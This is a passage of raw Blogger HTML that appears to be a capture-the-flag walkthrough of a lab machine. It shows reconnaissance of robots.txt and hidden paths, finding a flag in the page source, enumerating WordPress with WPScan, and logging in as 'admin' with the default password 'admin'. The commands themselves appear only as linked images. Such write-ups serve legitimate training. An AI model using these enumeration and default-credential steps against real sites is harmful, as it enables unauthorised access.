src=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEjwL1kTAfdS_hX_qNje3xDn317ZJw_dJ0vv8IOLgsVmuLhW8LWVreFBLrr0GTnZ9_ib3-BkEXwJjoquBrFU60PGlenulaOjoqiJy3MQTMMXsOP81pf9i-k9KbfpZe1vDTiiMJZ23nrkdcW-fgMUe-3cQX9hOHSQH7TzG2wr849zdf8l-5KmHlyHABKKrQ=s16000&quot; /&gt;&lt;/a&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;- Reading &lt;b&gt;robots.txt&lt;/b&gt;:&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;/span&gt;&lt;/p&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEjc9htS8t3aYdQv71Dr8iMluWVnUNLzC6ffnbD0ElKY6AbSpaQQenf5_AEdUOv0ouEZH87oC1kYOLuzbGrDQh9hgHYJmWok_DMKieyTDhaYrpS46pnb38sj8TYcH-Rc6E-2HDAaGAWAIDQFq55ky5v82NDRTvrgvUDvmxUsYvOnjFOw2qJiVe6AbuBm1g&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;171&quot; data-original-width=&quot;413&quot; src=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEjc9htS8t3aYdQv71Dr8iMluWVnUNLzC6ffnbD0ElKY6AbSpaQQenf5_AEdUOv0ouEZH87oC1kYOLuzbGrDQh9hgHYJmWok_DMKieyTDhaYrpS46pnb38sj8TYcH-Rc6E-2HDAaGAWAIDQFq55ky5v82NDRTvrgvUDvmxUsYvOnjFOw2qJiVe6AbuBm1g=s16000&quot; /&gt;&lt;/a&gt;&lt;/span&gt;&lt;/div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;p&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;- Acess to &lt;b&gt;/php&lt;/b&gt; is denied:&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;/span&gt;&lt;/p&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEjC1Ltkgdk-0PgWe6VveJQoNF_2cKt2shKFV8Zi-iUIhFrUk7YwfdLYLc3jMGdp5elsf1WtU7yOERHGZMYBj5DHziw6-aVTqv7nBadnuJ3Lym5_PlxCNIglgsCRjsCEGkWJsb_QuBCIsIAFrrDdi1i21R_Xv6qWD8D4ac2EgoipANjPvEbu2IAt8cylHA&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;275&quot; data-original-width=&quot;597&quot; src=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEjC1Ltkgdk-0PgWe6VveJQoNF_2cKt2shKFV8Zi-iUIhFrUk7YwfdLYLc3jMGdp5elsf1WtU7yOERHGZMYBj5DHziw6-aVTqv7nBadnuJ3Lym5_PlxCNIglgsCRjsCEGkWJsb_QuBCIsIAFrrDdi1i21R_Xv6qWD8D4ac2EgoipANjPvEbu2IAt8cylHA=s16000&quot; /&gt;&lt;/a&gt;&lt;/span&gt;&lt;/div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;p&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;- Nothing interesting at &lt;b&gt;/temporary&lt;/b&gt;:&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;/span&gt;&lt;/p&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEgImUZ8t7QhoPrYFlSkY0cnVTQ-8mDN_ys_sEkqZW32jwuqYPDihTVLT82-v51DvV9HSWUlLS4V4X-6V_VimiNUveDbnq_1FTQTBrpaOCi6_ThizHA-e0VVUZcITjhhueOlbXQnF_JCH2sP4zUoqox2zki_iZ3GH4vshdxxfmXb5NjIKndAQ0F6KwcQEw&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;145&quot; data-original-width=&quot;423&quot; src=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEgImUZ8t7QhoPrYFlSkY0cnVTQ-8mDN_ys_sEkqZW32jwuqYPDihTVLT82-v51DvV9HSWUlLS4V4X-6V_VimiNUveDbnq_1FTQTBrpaOCi6_ThizHA-e0VVUZcITjhhueOlbXQnF_JCH2sP4zUoqox2zki_iZ3GH4vshdxxfmXb5NjIKndAQ0F6KwcQEw=s16000&quot; /&gt;&lt;/a&gt;&lt;/span&gt;&lt;/div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;p&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;- Editing&lt;b&gt; /etc/hosts&lt;/b&gt;:&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;/span&gt;&lt;/p&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEi9oasb4nznX7PEcAKJyjP9LPTn6qr2Q730O-kkqPNMNRbwsAMNRRGecVRgLToHoPzP_lww8dh7go1o5IO5auuy09FERF8OkoTdfoutCRgLsd6XK8Zb0ZofivqCH3XxDu7VETddJ3fc57NwbXel-lYkeEO_ZSyoq9Q1YFvs27IuoXCwHbcxkYALYlLqCw&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;49&quot; data-original-width=&quot;363&quot; src=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEi9oasb4nznX7PEcAKJyjP9LPTn6qr2Q730O-kkqPNMNRbwsAMNRRGecVRgLToHoPzP_lww8dh7go1o5IO5auuy09FERF8OkoTdfoutCRgLsd6XK8Zb0ZofivqCH3XxDu7VETddJ3fc57NwbXel-lYkeEO_ZSyoq9Q1YFvs27IuoXCwHbcxkYALYlLqCw=s16000&quot; /&gt;&lt;/a&gt;&lt;/span&gt;&lt;/div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;p&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEjXM6eD-HGygQdKT8aQE7X5fFNT7hGnBKu0OPmY1PYh6XAgfMnLMYMeU7UJj4-AoFQl-SSiTvRmgpcv_2SoXI3EeUbRxkCeGnCjrXYfGxahkO2LwGJtXqauS0ZSM-6bhmx_dT414xuXdl7CSI0T7xmbUVk0rV9m0kGHo3B0sBjKWdK7Ah_oT-AuFD_HlQ&quot; style=&quot;clear: left; display: inline !important; font-family: arial; margin-bottom: 1em; margin-right: 1em; text-align: center;&quot;&gt;&lt;span style=&quot;font-size: medium;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;57&quot; data-original-width=&quot;342&quot; src=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEjXM6eD-HGygQdKT8aQE7X5fFNT7hGnBKu0OPmY1PYh6XAgfMnLMYMeU7UJj4-AoFQl-SSiTvRmgpcv_2SoXI3EeUbRxkCeGnCjrXYfGxahkO2LwGJtXqauS0ZSM-6bhmx_dT414xuXdl7CSI0T7xmbUVk0rV9m0kGHo3B0sBjKWdK7Ah_oT-AuFD_HlQ=s16000&quot; /&gt;&lt;/span&gt;&lt;/a&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;- Now we can &lt;b&gt;view-source&lt;/b&gt; the webpage and discover &lt;b&gt;FLAG_1&lt;/b&gt;:&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;/span&gt;&lt;/p&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEjK46JolnQC29NRZgrBeCr3mFfnJuK8FjHp8ERpyGusWMQEGzH0VfGldhwhe74v9SUUpx4cXKy67szFTSNHHxioN_WCk3bgu12oF6tAWkFFfLXGHvR6v4PuoNwCo4E5DJXudV_JvLWMw0EP5iipCzQw4FNEC-U5qheMV6vnQ0aNmBBhWoHK39r5PAD6UQ&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;806&quot; data-original-width=&quot;618&quot; src=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEjK46JolnQC29NRZgrBeCr3mFfnJuK8FjHp8ERpyGusWMQEGzH0VfGldhwhe74v9SUUpx4cXKy67szFTSNHHxioN_WCk3bgu12oF6tAWkFFfLXGHvR6v4PuoNwCo4E5DJXudV_JvLWMw0EP5iipCzQw4FNEC-U5qheMV6vnQ0aNmBBhWoHK39r5PAD6UQ=s16000&quot; /&gt;&lt;/a&gt;&lt;/span&gt;&lt;/div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;p&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;/span&gt;&lt;/p&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;- Browsing &lt;b&gt;/weblog&lt;/b&gt;:&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEiJdRt84afy7yYoJI0TwJLJ49gDjLA-rI6sncDVEjT2iUs_din7mv02dBTVoJpOtgA-Hq7K777x_WC327mgnvcDPYF_Vr3D9nRDjDRSLdy8iCvb5s3As1fJHU19iIECpAaR7WsRXbNNNIR46fKagW3lxB9noSLyGyjwuXDPRzN1QqGI0VHG0hG_PUfS1Q&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;785&quot; data-original-width=&quot;648&quot; src=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEiJdRt84afy7yYoJI0TwJLJ49gDjLA-rI6sncDVEjT2iUs_din7mv02dBTVoJpOtgA-Hq7K777x_WC327mgnvcDPYF_Vr3D9nRDjDRSLdy8iCvb5s3As1fJHU19iIECpAaR7WsRXbNNNIR46fKagW3lxB9noSLyGyjwuXDPRzN1QqGI0VHG0hG_PUfS1Q=s16000&quot; /&gt;&lt;/a&gt;&lt;/span&gt;&lt;/div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;p&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;/span&gt;&lt;/p&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;- The bottom part confirms that it is powered by &lt;b&gt;Wordpress&lt;/b&gt;:&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEjB61B-ROmJmcwU8LHyRx_SHEZF7oYFHgvnLryflXZC0VWFeZSl5MFF2aCM9A2j5aBVLdOcQZm7xMPQy0PINomfBOZlubcQVkJe2XPsSGO5BcoYuNymZ1g365268c2w-9wlp2nz8JRYX9NF5hcLkCJO5BsCYxTaq-Yh3fad2r-VgYn0BeAzqo_lDERXkw&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;580&quot; data-original-width=&quot;671&quot; src=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEjB61B-ROmJmcwU8LHyRx_SHEZF7oYFHgvnLryflXZC0VWFeZSl5MFF2aCM9A2j5aBVLdOcQZm7xMPQy0PINomfBOZlubcQVkJe2XPsSGO5BcoYuNymZ1g365268c2w-9wlp2nz8JRYX9NF5hcLkCJO5BsCYxTaq-Yh3fad2r-VgYn0BeAzqo_lDERXkw=s16000&quot; /&gt;&lt;/a&gt;&lt;/span&gt;&lt;/div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;p&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;/span&gt;&lt;/p&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;- So let&#39;s use &lt;b&gt;Wpscan&lt;/b&gt; to scan the &lt;b&gt;Wordpress&lt;/b&gt; webpage, searching for users and plugins, and discovering user &lt;b&gt;admin&lt;/b&gt; and plugin &lt;b&gt;slideshow-gallery&lt;/b&gt;:&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEgI9vaT3t0A_CA30B8A2m1p6V-7FQcozrledzU93atAUJtAfxxYt72Va7WiqDpq_hgofqV8C-ebD8xWG3vPb4kJk0uiXFadbrlL84sJWWlV9RqBAWSR2H0wbkP1zj_BgPU6233mY3qOsEdhuEfMZMNI-5oksV3aPtTA_MWD_cnS1Eq8luz9S5CzSV5ybg&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;45&quot; data-original-width=&quot;662&quot; src=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEgI9vaT3t0A_CA30B8A2m1p6V-7FQcozrledzU93atAUJtAfxxYt72Va7WiqDpq_hgofqV8C-ebD8xWG3vPb4kJk0uiXFadbrlL84sJWWlV9RqBAWSR2H0wbkP1zj_BgPU6233mY3qOsEdhuEfMZMNI-5oksV3aPtTA_MWD_cnS1Eq8luz9S5CzSV5ybg=s16000&quot; /&gt;&lt;/a&gt;&lt;/span&gt;&lt;/div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;p&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;/span&gt;&lt;/p&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;p&gt;&lt;/p&gt;&lt;p&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEjRbWDboe5yNLHHrWzsDCwGrhLGFvAiS1BJR5Xq3vAuO104Uk55koqEWxHGU0hGiewqdS99Ue_PaR1S4GaFAARes_5oGY7phxleQrlst9XN2uT6Z9mcHGER-wInB4I7GR6-wUVkIZo6oM02c-LEdsJANM5G-cOzoihWLVm57xm4X06EZL6tVShZDU5D-Q&quot; style=&quot;clear: left; display: inline !important; margin-bottom: 1em; margin-right: 1em; text-align: center;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;83&quot; data-original-width=&quot;856&quot; src=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEjRbWDboe5yNLHHrWzsDCwGrhLGFvAiS1BJR5Xq3vAuO104Uk55koqEWxHGU0hGiewqdS99Ue_PaR1S4GaFAARes_5oGY7phxleQrlst9XN2uT6Z9mcHGER-wInB4I7GR6-wUVkIZo6oM02c-LEdsJANM5G-cOzoihWLVm57xm4X06EZL6tVShZDU5D-Q=s16000&quot; /&gt;&lt;/span&gt;&lt;/a&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEiA8a6Z_foZptzWYd7voR9EWXI1kXcSWM8J9Sh-N-fUn3EPQpVDL_NTp-UWc-9CZloQzOU13NgiM41ESOAdByuNNhL09T60YdziuH0rzMgnGXVxmGiJEBDZ2wrxGAw0FoE0H9z3nZG0YaRCbbO8JW2EXWKfXLg2-7UrC21kig0yFAekphDU3eLrrMs0tA&quot; style=&quot;clear: left; display: inline !important; margin-bottom: 1em; margin-right: 1em; text-align: center;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;292&quot; data-original-width=&quot;972&quot; src=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEiA8a6Z_foZptzWYd7voR9EWXI1kXcSWM8J9Sh-N-fUn3EPQpVDL_NTp-UWc-9CZloQzOU13NgiM41ESOAdByuNNhL09T60YdziuH0rzMgnGXVxmGiJEBDZ2wrxGAw0FoE0H9z3nZG0YaRCbbO8JW2EXWKfXLg2-7UrC21kig0yFAekphDU3eLrrMs0tA=s16000&quot; /&gt;&lt;/a&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;- Trying &lt;b&gt;admin:admin&lt;/b&gt; the login is successful:&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;/span&gt;&lt;/p&gt;&lt;div 